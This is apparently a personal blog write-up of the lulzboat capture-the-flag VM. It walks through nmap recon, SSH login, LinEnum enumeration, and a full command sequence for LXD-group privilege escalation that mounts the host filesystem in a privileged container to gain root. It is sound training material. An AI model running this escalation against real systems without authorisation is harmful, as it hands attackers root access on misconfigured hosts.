Introduction
In between client projects, marketing, sales and looking after the lab, I try to keep my technical skills sharp. One way I do this is to practise in the lab and on CTF arenas. I was cruising Twitter for threat intel and keeping in touch with the community when I saw @ZachBarker1338 had submitted a VM to Hack The Box. Unfortunately, for a number of reasons it didn't meet the HTB review criteria, but that didn't stop the VM being published in another manner: @ZachBarker1338 collaborated with Secjuice (https://www.secjuice.com/) to release the lulzboat CTF challenge VM.
Steps
- Download the virtual machine (you will need Oracle VirtualBox installed): https://www.secjuice.com/lulzboat-ctf-by-lulzseczombie/
- Configure networking (I had to use host-only networking to gain access to the VM; you may get access on a DHCP network, but I tried a few different DHCP-enabled segments with no joy)
- Load up a Kali instance (I set up a Kali VM in VirtualBox with dual NICs to provide internet access)
- Enumerate and hack your way in
- Use your LulzSec knowledge (or Wikipedia) to decipher the clues and finally reveal the flags
Breakdown (spoilers ahead)
Phase 1 Recon
Nmap the host:
nmap -F -T5 -Pn 192.168.56.103
We can see from the scan output that TCP 80 and 22 are open.
Phase 2 – Action on target (usermode)
Now that we have the password, we need to log into the VM over SSH. As you can see from the text, we don't know the username. In traditional Hack The Box style, the username is the creator of the virtual machine; in this case, lulzseczombie.
A quick ssh lulzseczombie@192.168.56.103 gives us a user-mode shell:
Now that we have confirmed user mode, we grab the user.txt flag!
A shrubbery... LulzSec... that can only mean the user flag is "Topiary" (https://www.merriam-webster.com/dictionary/topiary)
Next, it’s time to start hunting for a privilege escalation route.
In this instance it's possible to locate the privilege escalation route just by running the id command, which shows the user is a member of the lxd group:
However, that's with hindsight. I personally found the route (this wasn't actually the planned privesc route; there's a kernel vulnerability as well that can be exploited!) by uploading LinEnum.sh and executing it:
LXD looks interesting: it's a Linux container solution, and membership of the lxd group just screamed container breakout, since a member can create a privileged container with the host filesystem mounted inside it.
The next step was to build an Alpine image on the Kali VM and copy it over to the target:
# on the Kali VM: build an Alpine image for LXD (build-alpine needs root)
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
# copy the resulting tarball to the target user's home directory
scp alpine-v3.7-x86_64-20180621_0444.tar.gz lulzseczombie@192.168.56.103:
# ssh to the lulzboat VM
mkdir lulz
mv alpine-v3.7-x86_64-20180621_0444.tar.gz lulz
cd lulz
# import the tarball as an LXD image
lxc image import alpine-v3.7-x86_64-20180621_0444.tar.gz --alias lulz
# list the image
lxc image list
# create a container in privileged mode
lxc init lulz ignite -c security.privileged=true
# mount the host filesystem at /mnt/root inside the container
lxc config device add ignite mydevice disk path=/mnt/root source=/ recursive=true
# start the container and execute a shell in it
lxc start ignite
lxc exec ignite /bin/sh
# navigate to the mounted root path (/mnt/root) and cat the flag
Finally, we can see the flag is DES encrypted. The clue here is the LulzSec motto...
So we head over to a web-based DES decryption tool to start trying to decrypt (no, this wasn't a first hit IRL; I went all round the houses first, generating a wordlist etc.)
So there we have it! From zero to hero with some simple enumeration and a bit of a history test thrown in. I really enjoyed this challenge; the LulzSec theme was fun and the route to pwn this box was pitched at a reasonable level. Well done to @Cephurs and @knoself for getting first blood and second place!
If you are interested in expanding your skills, capture the flag competitions are a great way to hone them. There are some great platforms out there, such as:
- Hack the Box (https://www.hackthebox.eu/)
- Immersive labs (https://www.immersivelabs.co.uk/)
- OSCP Labs (https://www.offensive-security.com/offensive-security-solutions/virtual-penetration-testing-labs/)
Thanks to @ZachBarker1338 for taking the time to put this together and @secjuice for publishing!